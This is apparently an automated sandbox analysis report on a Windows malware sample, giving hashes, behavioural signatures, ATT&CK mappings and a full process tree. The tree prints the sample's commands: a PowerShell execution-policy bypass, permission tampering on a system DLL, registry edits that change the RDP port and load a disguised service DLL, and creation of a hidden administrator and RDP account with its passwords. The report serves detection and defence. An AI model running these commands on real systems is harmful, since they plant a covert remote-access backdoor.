Analysis

  • max time kernel
    145s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    06-11-2020 10:49

General

  • Target

    7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe

  • Size

    3.1MB

  • MD5

    5759db9acfaeaee9c5186d5b8ff6b289

  • SHA1

    fc8f63658cb6e2b27ab97ebc15b6ec791eda4834

  • SHA256

    7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964

  • SHA512

    599e7b2665bc25250f8ddebd2f73d07fe7b63f313bcdbd2893df912cf458fa6b2084754170c22601696c5ea9c49827bd2dc8f0a8e3b1533333b3cadbd5cd954e

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 130 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe
    "C:\Users\Admin\AppData\Local\Temp\7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1584
    • \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\01lbdwrv\01lbdwrv.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:568
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C01.tmp" "c:\Users\Admin\AppData\Local\Temp\01lbdwrv\CSC6135666716045CC8C5C9F861D69A55.TMP"
          4⤵
            PID:1504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:736
        • C:\Windows\system32\takeown.exe
          "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1052
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:820
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          • Suspicious use of AdjustPrivilegeToken
          PID:964
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:860
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1348
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:824
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:992
        • C:\Windows\system32\icacls.exe
          "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
          3⤵
          • Possible privilege escalation attempt
          • Modifies file permissions
          PID:1972
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:300
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:1380
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:952
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1652
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1560
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1600
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                    PID:1644
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      5⤵
                        PID:1576
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start rdpdr
                          6⤵
                            PID:1356
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                      3⤵
                        PID:568
                        • C:\Windows\system32\cmd.exe
                          cmd /c net start TermService
                          4⤵
                            PID:1156
                            • C:\Windows\system32\net.exe
                              net start TermService
                              5⤵
                                PID:1340
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 start TermService
                                  6⤵
                                    PID:1828
                            • C:\Windows\system32\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                              3⤵
                                PID:1668
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                3⤵
                                  PID:300
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc Ghar4f5 /del
                              1⤵
                                PID:864
                                • C:\Windows\system32\net.exe
                                  net.exe user wgautilacc Ghar4f5 /del
                                  2⤵
                                    PID:820
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                      3⤵
                                        PID:1712
                                  • C:\Windows\System32\cmd.exe
                                    cmd /C net.exe user wgautilacc uWp0XAKy /add
                                    1⤵
                                      PID:440
                                      • C:\Windows\system32\net.exe
                                        net.exe user wgautilacc uWp0XAKy /add
                                        2⤵
                                          PID:1348
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user wgautilacc uWp0XAKy /add
                                            3⤵
                                              PID:1132
                                        • C:\Windows\System32\cmd.exe
                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                          1⤵
                                            PID:552
                                            • C:\Windows\system32\net.exe
                                              net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                              2⤵
                                                PID:300
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                  3⤵
                                                    PID:1380
                                              • C:\Windows\System32\cmd.exe
                                                cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                1⤵
                                                  PID:332
                                                  • C:\Windows\system32\net.exe
                                                    net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                    2⤵
                                                      PID:1652
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
                                                        3⤵
                                                          PID:1552
                                                    • C:\Windows\System32\cmd.exe
                                                      cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                      1⤵
                                                        PID:1572
                                                        • C:\Windows\system32\net.exe
                                                          net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                          2⤵
                                                            PID:976
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                              3⤵
                                                                PID:736
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd /C net.exe user wgautilacc uWp0XAKy
                                                            1⤵
                                                              PID:1772
                                                              • C:\Windows\system32\net.exe
                                                                net.exe user wgautilacc uWp0XAKy
                                                                2⤵
                                                                  PID:864
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 user wgautilacc uWp0XAKy
                                                                    3⤵
                                                                      PID:936
                                                                • C:\Windows\System32\cmd.exe
                                                                  cmd.exe /C net user wgautilacc 1234
                                                                  1⤵
                                                                    PID:1112
                                                                    • C:\Windows\system32\net.exe
                                                                      net user wgautilacc 1234
                                                                      2⤵
                                                                        PID:1876
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 user wgautilacc 1234
                                                                          3⤵
                                                                            PID:316

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                      Persistence

                                                                      Account Manipulation

                                                                      1
                                                                      T1098

                                                                      Registry Run Keys / Startup Folder

                                                                      1
                                                                      T1060

                                                                      Modify Existing Service

                                                                      1
                                                                      T1031

                                                                      Defense Evasion

                                                                      Modify Registry

                                                                      3
                                                                      T1112

                                                                      File Permissions Modification

                                                                      1
                                                                      T1222

                                                                      Lateral Movement

                                                                      Remote Desktop Protocol

                                                                      1
                                                                      T1076

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2226887a-9288-4994-b1f9-010d34e4c810
                                                                        MD5

                                                                        6f0d509e28be1af95ba237d4f43adab4

                                                                        SHA1

                                                                        c665febe79e435843553bee86a6cea731ce6c5e4

                                                                        SHA256

                                                                        f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                                                        SHA512

                                                                        8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2ac65c3b-77ab-45c1-a402-a78e00f82c95
                                                                        MD5

                                                                        2d5cd190b5db0620cd62e3cd6ba1dcd3

                                                                        SHA1

                                                                        ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                                                        SHA256

                                                                        ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                                                        SHA512

                                                                        edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f510d17-4b56-4285-81b2-b3f7485b6c72
                                                                        MD5

                                                                        a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                                                        SHA1

                                                                        81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                                                        SHA256

                                                                        dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                                                        SHA512

                                                                        8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_71d1eb8a-00f7-4c77-afb0-78d6d65e3d00
                                                                        MD5

                                                                        e5b3ba61c3cf07deda462c9b27eb4166

                                                                        SHA1

                                                                        b324dad73048be6e27467315f82b7a5c1438a1f9

                                                                        SHA256

                                                                        b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                                                        SHA512

                                                                        a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9e25e5c3-75ed-49d5-b47b-38d36636e6d5
                                                                        MD5

                                                                        faa37917b36371249ac9fcf93317bf97

                                                                        SHA1

                                                                        a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                                                        SHA256

                                                                        b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                                                        SHA512

                                                                        614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac0e291d-99cf-4476-abc4-ada5a163a7ef
                                                                        MD5

                                                                        d89968acfbd0cd60b51df04860d99896

                                                                        SHA1

                                                                        b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                                                        SHA256

                                                                        1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                                                        SHA512

                                                                        b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3e48bb9-b241-4e7a-a7df-20e6c938c45b
                                                                        MD5

                                                                        7f79b990cb5ed648f9e583fe35527aa7

                                                                        SHA1

                                                                        71b177b48c8bd745ef02c2affad79ca222da7c33

                                                                        SHA256

                                                                        080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                                                        SHA512

                                                                        20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        fad7f8ffe887e948b1dd5880797b1257

                                                                        SHA1

                                                                        b134015a6bfbc484c0a7f99e9143844bd2acec90

                                                                        SHA256

                                                                        b3cfebc58603e9819520b418a4959ddcf93a776b0a5ea8f346aeedaa92beb7fa

                                                                        SHA512

                                                                        9d16e111fa0e12e7c871b106bf5e21fb4fdb699a13a8d6490c61ef76e9662bd9433e404129eb8a3095a01c1b7e4b569de1e0dc2c377a41a5d5d38db5aa6df0aa

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        84e7aa6fc098b751cb0be15bc6ef046e

                                                                        SHA1

                                                                        aac5ac40f33e60700b2978f7929d897a0ca0b5a6

                                                                        SHA256

                                                                        293e4817d47eb300d5e354a6ae0583d737efa0026a25cd10e9f368ed65d71e1e

                                                                        SHA512

                                                                        2c3a955d3d92c021fb52a05ef2d73f7aad6402bd1293c2c809ba7c1f113c11d3dfae5c86bd9d83e13335dd5c507c6eb7f29bae5f257bb0037af1228374a8e0f9

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        7f8eb096a159d4e04e70b277a74ec461

                                                                        SHA1

                                                                        c2e19fd20d087af9cc43aaee13ec2e36baa9bd97

                                                                        SHA256

                                                                        98bd5610ff15886bd2d752abdfa4b6eed444845189e54404c21d78f1647403c1

                                                                        SHA512

                                                                        7c2df8644c260938c20d206390814c0ebd854b905bacc442fafb4b9843e1d272e894edde1c43b484d43b0bcd7378780a47ee2fd8beef3a3716c0657c33ec1518

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        3ecd3c05451ce6324ecf597d9de4b22a

                                                                        SHA1

                                                                        18d902a3d48a52b486a63f1dbeaeb5c3e6deef51

                                                                        SHA256

                                                                        5404f1b59ee0db7489693c745a0b68a4c1e52303a683a048aa9041c63d84719b

                                                                        SHA512

                                                                        c242dfe55c513620ae461b75b85387fc9a32d7d2b29a29fdcdc040e48b14c2dc363ad5e0969738b3ed860eaedcddb81a3ac11dbada71581205c0599fd9bd8e07

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                        MD5

                                                                        d75ccbfb706e0d0bfaf073b994472ef4

                                                                        SHA1

                                                                        8084152e61f9f7225d247e58e50e8c37cb525783

                                                                        SHA256

                                                                        fe86487c5da420b3604f29dd31aba307e2b625023b96f2352aaa7f1f509d1d34

                                                                        SHA512

                                                                        d0e504170e6fd9c647e11db428da775bbab6466641d6f5c75a474144aaedea24ea1f102f05469bc7951224eaf3dc2032e502d236b4a909e53577f4814842c7af

                                                                      • C:\Users\Admin\AppData\Local\Temp\01lbdwrv\01lbdwrv.dll
                                                                        MD5

                                                                        5dacad9dd3aa41ccce4924aa1b6a4b00

                                                                        SHA1

                                                                        22524c046c80f333ba31ff671ea971a3cc690c67

                                                                        SHA256

                                                                        95a2a9666ee82d761c7cee6803d90b675eb5b229529d08b2db8452096d01bfdb

                                                                        SHA512

                                                                        8c5ddb8ee88655953d6d6a4570ebd755f20856f718baafa68395b7aa10a6f897b7182f36fe07950c17100406b36c2691d59e25b05e43cc177c4cd074f3b5d3c2

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES9C01.tmp
                                                                        MD5

                                                                        0125c058e128a34a8b73e415d19f2fbf

                                                                        SHA1

                                                                        c54bb312c7f61653b70c90933699bf2f814d8131

                                                                        SHA256

                                                                        7d073ecbc6a979838e99f21b4ba077fd093beb40a823b715ca01f997bb6eafb7

                                                                        SHA512

                                                                        47a9448f0dfdd90ae53b163da2e63eb1999860ebc776bddc4d1cd6322fb6c92a39e61bb44766e0c8502810e7266d8486247dfc69e59c7228c3ae94355ea8462f

                                                                      • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                                                        MD5

                                                                        41d1a9d1cbee90f1e5f27fdfb299f8b8

                                                                        SHA1

                                                                        1e9ac27006a7c364649265246fccbd719418ceab

                                                                        SHA256

                                                                        0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

                                                                        SHA512

                                                                        f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        12de4aa68db28289d1dec6730cbb1cbe

                                                                        SHA1

                                                                        6e9d3f016a195d20ce129240168bd9f17f0c3ba0

                                                                        SHA256

                                                                        93159ac3fed25bc702b9c008ad4b3eb6ea3fff48b5eba18f03ac06c5aed55343

                                                                        SHA512

                                                                        dbda2dfba333ae1c892ff11ab8be84d6bd50fac09f990747f1bac232e96a1a7d17e19729e615b11a4b5091a055e576c7e2dc55d1c3090df4e0a2192157f38932

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        12de4aa68db28289d1dec6730cbb1cbe

                                                                        SHA1

                                                                        6e9d3f016a195d20ce129240168bd9f17f0c3ba0

                                                                        SHA256

                                                                        93159ac3fed25bc702b9c008ad4b3eb6ea3fff48b5eba18f03ac06c5aed55343

                                                                        SHA512

                                                                        dbda2dfba333ae1c892ff11ab8be84d6bd50fac09f990747f1bac232e96a1a7d17e19729e615b11a4b5091a055e576c7e2dc55d1c3090df4e0a2192157f38932

                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                        MD5

                                                                        12de4aa68db28289d1dec6730cbb1cbe

                                                                        SHA1

                                                                        6e9d3f016a195d20ce129240168bd9f17f0c3ba0

                                                                        SHA256

                                                                        93159ac3fed25bc702b9c008ad4b3eb6ea3fff48b5eba18f03ac06c5aed55343

                                                                        SHA512

                                                                        dbda2dfba333ae1c892ff11ab8be84d6bd50fac09f990747f1bac232e96a1a7d17e19729e615b11a4b5091a055e576c7e2dc55d1c3090df4e0a2192157f38932

                                                                      • C:\Windows\system32\rfxvmt.dll
                                                                        MD5

                                                                        dc39d23e4c0e681fad7a3e1342a2843c

                                                                        SHA1

                                                                        58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                        SHA256

                                                                        6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                        SHA512

                                                                        5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                      • \??\PIPE\lsarpc
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\PIPE\samr
                                                                        MD5

                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                        SHA1

                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                        SHA256

                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                        SHA512

                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\01lbdwrv\01lbdwrv.0.cs
                                                                        MD5

                                                                        8e55cb0ca998472ab6d3e295e0c4dd50

                                                                        SHA1

                                                                        407d07a29b89fc3afc246c0680d5857e3f51019d

                                                                        SHA256

                                                                        63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

                                                                        SHA512

                                                                        c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\01lbdwrv\01lbdwrv.cmdline
                                                                        MD5

                                                                        eba5dcee1936d7dfdb729e04005df736

                                                                        SHA1

                                                                        30b54d07b580bbbc6954deae895d1c4c3c892b97

                                                                        SHA256

                                                                        d5250556acd744bcf50f50f4ef132ceaf22755c2db1cf72686450a4073bae0e0

                                                                        SHA512

                                                                        06ca1b19132dbec43cfc3be56381602e56051263c80dc64ac9a167e717ea16295e19c251a4a2a7e0f7c2cd1331b746eb6e99aa95b2a685952205c9e6a52b56e6

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\01lbdwrv\CSC6135666716045CC8C5C9F861D69A55.TMP
                                                                        MD5

                                                                        04cc04bf30e47da4d2b0401f301ae2e3

                                                                        SHA1

                                                                        6709e59ecf6ba18975f7837d42fdabca5104b90f

                                                                        SHA256

                                                                        9b5dd176e52d7846294040601380c484bcadd42fbe94c1f3cd2f5ae46729e4a0

                                                                        SHA512

                                                                        2fe07be2c70399c1db87a00c47721bf347515cf493fe0fb5ce0e1fafdc3fbdd813db7fc31a8e11afdc73e5f3b1d136e94674645c3fc34f3cf7d3e713069b6344

                                                                      • \Windows\Branding\mediasrv.png
                                                                        MD5

                                                                        37fb7ba711ffbe9d6ebb27d54e827966

                                                                        SHA1

                                                                        4d4d9303e011bcb14720b24239a1aacd58122f47

                                                                        SHA256

                                                                        81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

                                                                        SHA512

                                                                        3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

                                                                      • \Windows\Branding\mediasvc.png
                                                                        MD5

                                                                        2f916498a393e2f0d008d33a74c062ba

                                                                        SHA1

                                                                        404d52d4253ef3843ae3f2c4aff050f37fcd3f08

                                                                        SHA256

                                                                        d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

                                                                        SHA512

                                                                        d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

                                                                      • memory/300-94-0x0000000000000000-mapping.dmp
                                                                      • memory/300-113-0x0000000000000000-mapping.dmp
                                                                      • memory/300-122-0x0000000000000000-mapping.dmp
                                                                      • memory/316-126-0x0000000000000000-mapping.dmp
                                                                      • memory/568-103-0x0000000000000000-mapping.dmp
                                                                      • memory/568-10-0x0000000000000000-mapping.dmp
                                                                      • memory/736-42-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/736-40-0x0000000000000000-mapping.dmp
                                                                      • memory/736-118-0x0000000000000000-mapping.dmp
                                                                      • memory/820-87-0x0000000000000000-mapping.dmp
                                                                      • memory/820-109-0x0000000000000000-mapping.dmp
                                                                      • memory/824-91-0x0000000000000000-mapping.dmp
                                                                      • memory/860-89-0x0000000000000000-mapping.dmp
                                                                      • memory/864-119-0x0000000000000000-mapping.dmp
                                                                      • memory/936-120-0x0000000000000000-mapping.dmp
                                                                      • memory/952-96-0x0000000000000000-mapping.dmp
                                                                      • memory/964-88-0x0000000000000000-mapping.dmp
                                                                      • memory/976-117-0x0000000000000000-mapping.dmp
                                                                      • memory/992-92-0x0000000000000000-mapping.dmp
                                                                      • memory/1040-22-0x0000000000000000-mapping.dmp
                                                                      • memory/1040-24-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/1040-28-0x0000000002480000-0x0000000002481000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1040-76-0x000000001AB80000-0x000000001AB81000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1040-63-0x000000001B590000-0x000000001B591000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1040-32-0x000000001B6E0000-0x000000001B6E1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1040-77-0x000000001AB90000-0x000000001AB91000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1040-33-0x0000000002370000-0x0000000002371000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1052-85-0x0000000000000000-mapping.dmp
                                                                      • memory/1132-112-0x0000000000000000-mapping.dmp
                                                                      • memory/1156-104-0x0000000000000000-mapping.dmp
                                                                      • memory/1340-105-0x0000000000000000-mapping.dmp
                                                                      • memory/1348-90-0x0000000000000000-mapping.dmp
                                                                      • memory/1348-111-0x0000000000000000-mapping.dmp
                                                                      • memory/1356-102-0x0000000000000000-mapping.dmp
                                                                      • memory/1380-114-0x0000000000000000-mapping.dmp
                                                                      • memory/1380-95-0x0000000000000000-mapping.dmp
                                                                      • memory/1504-13-0x0000000000000000-mapping.dmp
                                                                      • memory/1516-17-0x00000000022B0000-0x00000000022B1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-7-0x0000000002370000-0x0000000002371000-memory.dmp
                                                                        Filesize

                                                                        4KB

